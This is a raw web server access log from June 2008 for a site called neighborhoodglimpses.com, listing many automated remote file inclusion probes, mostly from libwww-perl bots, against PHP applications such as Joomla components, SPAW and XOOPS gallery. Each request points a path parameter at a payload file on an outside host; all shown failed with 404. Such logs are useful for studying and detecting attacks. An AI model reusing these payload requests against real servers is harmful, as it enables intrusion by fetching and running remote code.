200.250.121.2 - - [01/Jun/2008:18:59:01 -0700] "GET /logs/plus.php?_pages_dir=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.140.135.103 - - [01/Jun/2008:19:00:08 -0700] "GET /logs/access.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.140.135.103 - - [01/Jun/2008:19:00:09 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.140.135.103 - - [01/Jun/2008:19:00:09 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
213.246.51.45 - - [01/Jun/2008:19:00:23 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
213.246.51.45 - - [01/Jun/2008:19:00:24 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:19:00:32 -0700] "GET /logs/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:19:00:32 -0700] "GET /database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.neighborhoodglimpses.com"
201.76.146.32 - - [01/Jun/2008:19:00:42 -0700] "GET /plus.php?_pages_dir=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
206.221.179.200 - - [01/Jun/2008:19:00:47 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.neighborhoodglimpses.com"
206.221.179.200 - - [01/Jun/2008:19:00:47 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.neighborhoodglimpses.com"
206.221.179.200 - - [01/Jun/2008:19:02:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "neighborhoodglimpses.com"
206.221.179.200 - - [01/Jun/2008:19:02:48 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "neighborhoodglimpses.com"
212.244.43.139 - - [01/Jun/2008:19:04:32 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.neighborhoodglimpses.com"
212.244.43.139 - - [01/Jun/2008:19:04:33 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.neighborhoodglimpses.com"
212.244.43.139 - - [01/Jun/2008:19:04:33 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.neighborhoodglimpses.com"
74.200.202.48 - - [01/Jun/2008:19:06:17 -0700] "GET /logs/access_071217.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
74.200.202.48 - - [01/Jun/2008:19:06:17 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
74.200.202.48 - - [01/Jun/2008:19:06:18 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
74.200.202.48 - - [01/Jun/2008:19:06:44 -0700] "GET /logs/access_071224.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
213.246.51.45 - - [01/Jun/2008:19:07:02 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
203.98.181.34 - - [01/Jun/2008:19:07:04 -0700] "GET /logs/access_080128.log//auto_check_renewals.php?installed_config_file=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
203.98.181.34 - - [01/Jun/2008:19:07:05 -0700] "GET //auto_check_renewals.php?installed_config_file=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
203.98.181.34 - - [01/Jun/2008:19:07:05 -0700] "GET /logs//auto_check_renewals.php?installed_config_file=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.229.199.197 - - [01/Jun/2008:19:07:46 -0700] "GET /logs/access_080225.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
200.229.199.197 - - [01/Jun/2008:19:07:46 -0700] "GET /logs/access_080225.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
200.229.199.197 - - [01/Jun/2008:19:07:47 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
200.229.199.197 - - [01/Jun/2008:19:07:47 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
200.229.199.197 - - [01/Jun/2008:19:07:47 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
200.229.199.197 - - [01/Jun/2008:19:07:47 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:19:08:50 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:19:08:51 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:19:08:51 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
74.200.202.48 - - [01/Jun/2008:19:08:58 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
166.90.8.230 - - [01/Jun/2008:19:09:00 -0700] "GET /logs/access_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
166.90.8.230 - - [01/Jun/2008:19:09:00 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
166.90.8.230 - - [01/Jun/2008:19:09:00 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
67.43.4.60 - - [01/Jun/2008:19:09:32 -0700] "GET /logs/access_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.43.4.60 - - [01/Jun/2008:19:09:32 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.43.4.60 - - [01/Jun/2008:19:09:32 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
69.16.242.144 - - [01/Jun/2008:19:09:54 -0700] "GET /logs/access_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
69.16.242.144 - - [01/Jun/2008:19:09:54 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
69.16.242.144 - - [01/Jun/2008:19:09:54 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
200.250.121.2 - - [01/Jun/2008:19:10:30 -0700] "GET /plus.php?_pages_dir=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
212.227.251.172 - - [01/Jun/2008:19:11:16 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
166.90.8.230 - - [01/Jun/2008:19:11:21 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
166.90.8.230 - - [01/Jun/2008:19:11:43 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:19:11:55 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:19:11:55 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:19:11:56 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
67.43.4.60 - - [01/Jun/2008:19:12:02 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:19:12:05 -0700] "GET /logs/access_080211.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:19:12:05 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:19:12:05 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:19:12:09 -0700] "GET /logs/access_080225.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:19:12:09 -0700] "GET /logs/access_080225.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:19:12:09 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:19:12:09 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:19:12:10 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:19:12:10 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:19:12:14 -0700] "GET /logs/access_080225.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:19:12:14 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
211.234.107.233 - - [01/Jun/2008:19:12:14 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
67.43.4.60 - - [01/Jun/2008:19:12:21 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
213.198.106.61 - - [01/Jun/2008:19:12:46 -0700] "GET /logs/access_071217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
213.198.106.61 - - [01/Jun/2008:19:12:46 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
213.198.106.61 - - [01/Jun/2008:19:12:47 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
69.16.242.144 - - [01/Jun/2008:19:12:51 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:19:13:17 -0700] "GET /logs/access_080225.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:19:13:17 -0700] "GET /logs/access_080225.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:13:17 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:13:18 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:19:13:18 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:19:13:18 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:13:18 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:19:13:18 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:19:13:18 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
69.16.242.144 - - [01/Jun/2008:19:13:19 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:19:13:24 -0700] "GET /logs/access_080225.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:19:13:24 -0700] "GET /logs/access_080225.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:19:13:24 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:19:13:24 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:19:13:25 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
202.29.32.2 - - [01/Jun/2008:19:13:25 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:19:13:32 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:19:13:36 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:19:13:46 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:13:49 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:13:49 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:13:49 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:19:13:50 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:19:13:50 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:19:13:51 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
89.108.64.164 - - [01/Jun/2008:19:13:56 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.64.164 - - [01/Jun/2008:19:13:57 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:14:08 -0700] "GET /logs/access_071119.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:14:08 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:14:09 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:14:28 -0700] "GET /logs/access_080211.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:14:29 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:14:29 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
87.230.21.32 - - [01/Jun/2008:19:14:34 -0700] "GET /logs/access_080225.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
87.230.21.32 - - [01/Jun/2008:19:14:34 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
87.230.21.32 - - [01/Jun/2008:19:14:35 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:19:15:43 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:19:15:46 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:19:15:50 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:19:16:56 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:19:16:57 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:19:17:00 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
207.7.108.240 - - [01/Jun/2008:19:17:37 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
207.7.108.240 - - [01/Jun/2008:19:17:37 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.32.194.164 - - [01/Jun/2008:19:17:38 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
80.32.194.164 - - [01/Jun/2008:19:17:42 -0700] "GET /logs/access_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
